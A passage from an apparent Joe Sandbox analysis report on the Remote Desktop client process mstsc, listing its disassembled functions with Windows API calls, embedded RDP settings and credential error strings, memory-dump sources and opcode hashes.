                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: 0caae6b5e39e747af2a03300f6b597c3e048971c8179430d62ca6cac344ffded
                                                                                                                                                                                    • Instruction ID: 7e30cd555751e29ce7d25cd4102aa4ca28448790bcd1ddb8ed25e0c65ec91259
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0caae6b5e39e747af2a03300f6b597c3e048971c8179430d62ca6cac344ffded
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B614971E20656A6DF34DFD9C8909BEBBB6EF84300794C43DE49B47648D334AA90DB60
                                                                                                                                                                                    Function 02343B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: b5f195e42624118577244cff84e9454579a782f77a231e293107eb7dac5e1464
                                                                                                                                                                                    • Instruction ID: 8af95536f04961662db63913a0b069946fa9c91663f7d73577a1db5ebca40ac7
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5f195e42624118577244cff84e9454579a782f77a231e293107eb7dac5e1464
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2061A3B2900645ABDB20DF99C84097E7BF6EF58310B24C5EAF8A987504E734EB80CB51
                                                                                                                                                                                    Function 0091EAC4 Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,0091EFB6,00000000), ref: 0091EAFB
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?,?,0091EFB6,00000000), ref: 0091EB46
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000338B), ref: 0091EB5A
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0091EB64
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB76
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB88
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB91
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0091EB98
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000104,?,?,0091EFB6,00000000), ref: 0091EBF9
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?,?,00000104,?,00000104,?,?,0091EFB6,00000000), ref: 0091ECA8
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ErrorItemLastLong$AddressFreeHandleLibraryModuleProcText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2044706978-0
                                                                                                                                                                                    • Opcode ID: 2b3e7b6dc1c145a3cdef24ab4d63594aa4d4f0e5bb6d5d8d2d5bd7963afab3da
                                                                                                                                                                                    • Instruction ID: 6d8d160389fa34e38928c50297727804a244ba8f7ca5fe7c3aca4356aee1bd92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b3e7b6dc1c145a3cdef24ab4d63594aa4d4f0e5bb6d5d8d2d5bd7963afab3da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B51B472A04308AFCB15DF68CD89EAA7FB9EB89310B150159FD41AB266C670DC80DF91
                                                                                                                                                                                    Function 00939AC5 Relevance: 16.6, APIs: 11, Instructions: 126windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009392F3: memset.MSVCRT ref: 00939323
                                                                                                                                                                                      • Part of subcall function 009392F3: SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009393AE
                                                                                                                                                                                      • Part of subcall function 009393CA: GetWindowLongW.USER32(?,000000EC), ref: 009393F2
                                                                                                                                                                                      • Part of subcall function 009393CA: GetDlgItem.USER32(?,00001396), ref: 00939408
                                                                                                                                                                                      • Part of subcall function 009393CA: GetWindowRect.USER32(00000000,?), ref: 00939413
                                                                                                                                                                                      • Part of subcall function 009393CA: ScreenToClient.USER32(?,?), ref: 0093946F
                                                                                                                                                                                      • Part of subcall function 009393CA: SendMessageW.USER32(00000000,0000041F,00000000), ref: 009394A2
                                                                                                                                                                                      • Part of subcall function 009393CA: SetWindowPos.USER32(00000000,00000000,?,00939ADF,?,?,00000004), ref: 009394CE
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00939B2F
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00001394,?,00000000,?,00000110,?,?,?,0093927F,?,?,?), ref: 00939B5A
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00939B99
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00939B9C
                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00939BEB
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001394), ref: 00939BF9
                                                                                                                                                                                    • SetFocus.USER32 ref: 00939BFC
                                                                                                                                                                                    • SetFocus.USER32 ref: 00939C0A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000127,00010002,00000000), ref: 00939C21
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 00939C2F
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?,?,0093927F,?,?,?), ref: 00939C43
                                                                                                                                                                                      • Part of subcall function 00939A59: GetDlgItemTextW.USER32(?,00001394,?,00000100,00000001,?), ref: 00939A87
                                                                                                                                                                                      • Part of subcall function 009511F8: GetDlgItem.USER32(?,?), ref: 00951217
                                                                                                                                                                                      • Part of subcall function 009511F8: EnableWindow.USER32(00000000,0093927F), ref: 00951225
                                                                                                                                                                                      • Part of subcall function 0095123D: GetDlgItem.USER32(?,?), ref: 0095125C
                                                                                                                                                                                      • Part of subcall function 0095123D: ShowWindow.USER32(00000000,0093927F), ref: 00951272
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShowText$EnableFocus$ClientLongRectScreenmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1960074330-0
                                                                                                                                                                                    • Opcode ID: 7cebb4c21a3e4a99146d24985d836b1a546b6a9682fe837b4642bd316e7e43c9
                                                                                                                                                                                    • Instruction ID: 56a4454761027fcfeff792fa427434aa302af102c7719772b727c5ae37e63e5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cebb4c21a3e4a99146d24985d836b1a546b6a9682fe837b4642bd316e7e43c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: D641C270244704ABDB216BA1CD86F7E76AAEBC4B05F40042DF68AA61A1CBF16C019F51
                                                                                                                                                                                    Function 0094E159 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 267registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094E25E
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094E2BC
                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 0094E316
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094E378
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094E446
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D87E: TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0094E494
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \, xrefs: 0094E1C1
                                                                                                                                                                                    • Unable to get AppContainer registry location., xrefs: 0094E223
                                                                                                                                                                                    • SOFTWARE\Microsoft\Terminal Server Client\%s, xrefs: 0094E187
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open$Close$AddressEnumFreeHandleLibraryMessageModuleProcTrace_vsnwprintf
                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$Unable to get AppContainer registry location.$\
                                                                                                                                                                                    • API String ID: 1061991183-810003542
                                                                                                                                                                                    • Opcode ID: c0269e778303b2d26cff6c904a94f77cd31c2a358afa8639ceba57fce0daf549
                                                                                                                                                                                    • Instruction ID: 532bb943d26abb58ab8ed99de7a90dad1fd3facdc015b8395eadb114642dcf1f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0269e778303b2d26cff6c904a94f77cd31c2a358afa8639ceba57fce0daf549
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2A1CC72218304AFDB2ADF64D858F667BE9BB48348F04485DFA45971A2C7B0DD80EF52
                                                                                                                                                                                    Function 009559FF Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 212memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00955A4D
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,009032EC,00000000,00000000), ref: 00955B04
                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000), ref: 00955CF3
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • StringCchCopy failed, xrefs: 00955B98
                                                                                                                                                                                    • szTempScope, xrefs: 00955B2C
                                                                                                                                                                                    • Mandatory sensitive setting not present, xrefs: 00955AA3
                                                                                                                                                                                    • Settings in signscope and file do not match up, xrefs: 00955CC8
                                                                                                                                                                                    • Field in SignScope not found in store, xrefs: 00955C95
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ActivityAllocControlEventFreeMessageTracememset
                                                                                                                                                                                    • String ID: Field in SignScope not found in store$Mandatory sensitive setting not present$Settings in signscope and file do not match up$StringCchCopy failed$szTempScope
                                                                                                                                                                                    • API String ID: 1105911404-2725555693
                                                                                                                                                                                    • Opcode ID: dec02388248f0a51d693eb66536e36c16f32382bdb57a048b419ffc5524091af
                                                                                                                                                                                    • Instruction ID: f1216e765acfcfead2ab7e5a5c3690bcfdcecdb66ca2547c14597416d80df183
                                                                                                                                                                                    • Opcode Fuzzy Hash: dec02388248f0a51d693eb66536e36c16f32382bdb57a048b419ffc5524091af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E8146716047049FCB29DF15CC64BA577AABB85309F52809DEC49AB2A3DB71CD89CF80
                                                                                                                                                                                    Function 0095D242 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateWindowExW.USER32 ref: 0095D265
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0095D272
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • LoadIconW.USER32 ref: 0095D2BE
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0095D2C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • m_spViewer->Initialize failed, xrefs: 0095D3D9
                                                                                                                                                                                    • SrApiViewerAxContainerClass, xrefs: 0095D25F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$AddressCreateFreeHandleIconLibraryLoadModuleProcWindow
                                                                                                                                                                                    • String ID: SrApiViewerAxContainerClass$m_spViewer->Initialize failed
                                                                                                                                                                                    • API String ID: 1003384205-847840934
                                                                                                                                                                                    • Opcode ID: 47816ff53ef05b57bff3ef61e1b10a569cfad8ccfd8e86cc201754ae9ba8dd01
                                                                                                                                                                                    • Instruction ID: 5b52a0c67725575c89e65d545a233e7458a6cd027b91079618e37038fe6c9023
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47816ff53ef05b57bff3ef61e1b10a569cfad8ccfd8e86cc201754ae9ba8dd01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51E1716193006FDB39CF169C09F253A9ABB49311F04405DF905AB5F2C775EC84EB86
                                                                                                                                                                                    Function 00951020 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 95registrywindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClassInfoW.USER32(?,TscShellDlg,?), ref: 00951038
                                                                                                                                                                                    • LoadIconW.USER32 ref: 0095106A
                                                                                                                                                                                    • LoadCursorW.USER32 ref: 00951079
                                                                                                                                                                                    • RegisterClassW.USER32(00002808), ref: 00951097
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009510A2
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00950E30), ref: 00951118
                                                                                                                                                                                    • UnregisterClassW.USER32(TscShellDlg,?,?,00950E30), ref: 00951147
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$ErrorLastLoad$CursorIconInfoRegisterUnregister
                                                                                                                                                                                    • String ID: "$TscShellDlg
                                                                                                                                                                                    • API String ID: 1263847228-207632914
                                                                                                                                                                                    • Opcode ID: 652c4fdb89eff4a911a221d4085c2cd1ca4652c1079e9f6fc706d24ca6e33fbc
                                                                                                                                                                                    • Instruction ID: 9c087e42e5739f1b76307557b8e989c6e29683eedc380554166bd22bbfd2cec9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 652c4fdb89eff4a911a221d4085c2cd1ca4652c1079e9f6fc706d24ca6e33fbc
                                                                                                                                                                                    • Instruction Fuzzy Hash: B931C371A08344AFDB14DFA6DC08BAA7BEAAF48315F10405DF981A72E1CBB5D884DF51
                                                                                                                                                                                    Function 00954A34 Relevance: 15.3, APIs: 2, Strings: 8, Instructions: 266COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00954A74
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000001), ref: 00954D85
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Empty signscope field, xrefs: 00954D2D
                                                                                                                                                                                    • CRdpSettingsStore::VerifySenstitiveSettings failed, xrefs: 00954B98
                                                                                                                                                                                    • CRdpSettingsStore::VerifySignature failed, xrefs: 00954AB4
                                                                                                                                                                                    • CRdpSettingsStore::GenerateSecureSettingsBlob failed, xrefs: 00954BEB
                                                                                                                                                                                    • CRdpSettingsStore::InitializeSignature failed., xrefs: 00954AFC
                                                                                                                                                                                    • SignScope, xrefs: 00954B3C
                                                                                                                                                                                    • CRdpSettingsStore::SetUnsignedBlob failed, xrefs: 00954C53
                                                                                                                                                                                    • Signature verification failed, xrefs: 00954CA8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ActivityControlEventFreeLocalMessageTracememset
                                                                                                                                                                                    • String ID: CRdpSettingsStore::GenerateSecureSettingsBlob failed$CRdpSettingsStore::InitializeSignature failed.$CRdpSettingsStore::SetUnsignedBlob failed$CRdpSettingsStore::VerifySenstitiveSettings failed$CRdpSettingsStore::VerifySignature failed$Empty signscope field$SignScope$Signature verification failed
                                                                                                                                                                                    • API String ID: 521830283-4263419474
                                                                                                                                                                                    • Opcode ID: 6c862ae33d1f322f0906764e2205d4ee904b3491df555d0f10ce538643a203ab
                                                                                                                                                                                    • Instruction ID: 05513ca6b5111b82ab0bb65f69a07beb4ae245cd4c5bbe78ab37896e7b4fd8fe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c862ae33d1f322f0906764e2205d4ee904b3491df555d0f10ce538643a203ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85A1F332608340AFC766DF56D849F6A3BE9AB89319F050458FD419B2E2C771DC88DF92
                                                                                                                                                                                    Function 00962AE3 Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00962B19
                                                                                                                                                                                    • memset.MSVCRT ref: 00962B2E
                                                                                                                                                                                    • memset.MSVCRT ref: 00962B4C
                                                                                                                                                                                    • memset.MSVCRT ref: 00962B67
                                                                                                                                                                                      • Part of subcall function 00958E3E: ??2@YAPAXI@Z.MSVCRT ref: 00958E50
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0094ADD3: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0094AE64
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,00000001,00000000,00000000,?,?,?,?,00000000,?), ref: 00962DFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CTscCredentialsQueryUi::CreateInstance failed!, xrefs: 00962C31
                                                                                                                                                                                    • GetCanonicalServerName failed!, xrefs: 00962C85
                                                                                                                                                                                    • SaveCreds failed!, xrefs: 00962DC7
                                                                                                                                                                                    • CTSCredManAssistant::CreateInstance failed!, xrefs: 00962BCE
                                                                                                                                                                                    • GetPromptTextId failed!, xrefs: 00962D1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Free$Local$??2@AddressHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CTSCredManAssistant::CreateInstance failed!$CTscCredentialsQueryUi::CreateInstance failed!$GetCanonicalServerName failed!$GetPromptTextId failed!$SaveCreds failed!
                                                                                                                                                                                    • API String ID: 22622411-1265546757
                                                                                                                                                                                    • Opcode ID: 62eb2558b8b63c640145e18fdda700a63b2785bd5aeb618d09ba214954f3d0a3
                                                                                                                                                                                    • Instruction ID: 2fca85ef15345c83b891fea94aa08e4290ee18032f5f5e16edda720185b21a24
                                                                                                                                                                                    • Opcode Fuzzy Hash: 62eb2558b8b63c640145e18fdda700a63b2785bd5aeb618d09ba214954f3d0a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D91FF71A08708AEDB26CFA0CC96FEA77BDEB95344F0000A9F506A7091DA71DD85DB61
                                                                                                                                                                                    Function 0095AA6B Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 205memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0095AA8A
                                                                                                                                                                                    • memset.MSVCRT ref: 0095AAE3
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000004,00000006), ref: 0095ABF1
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000), ref: 0095AC9D
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000), ref: 0095ACB7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$Free$Alloc$AddressHandleLibraryMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: PSEC_WINNT_AUTH_IDENTITY_EX2$PWSTR$SspiPrepareForCredRead failed$StringCbCopy failed$StringCbLength failed
                                                                                                                                                                                    • API String ID: 1071269685-1201727769
                                                                                                                                                                                    • Opcode ID: 7059e913026ab9f0ffcc1ba38655fe188c199ee0435180fb6ebd5e60115f54a0
                                                                                                                                                                                    • Instruction ID: 4bee86cd57885eb353fc3baa16de05f14f1f70917e2f748841bec85efce29e8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7059e913026ab9f0ffcc1ba38655fe188c199ee0435180fb6ebd5e60115f54a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86615B72904304AFC726CF56C845F6A7BAAEF49310F154199FD40AB2A2C7B5CD44EB8A
                                                                                                                                                                                    Function 00961095 Relevance: 15.2, APIs: 10, Instructions: 150windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostMessageW.USER32 ref: 009610DC
                                                                                                                                                                                    • EndDialog.USER32 ref: 009610E5
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C,?,00000000,?,00000002), ref: 0096114D
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B,00000000,?,00000000,?,00000002), ref: 00961156
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000139E), ref: 00961165
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,00000002), ref: 00961177
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000139D,?,00000000,?,00000000,?,00000002), ref: 009611CF
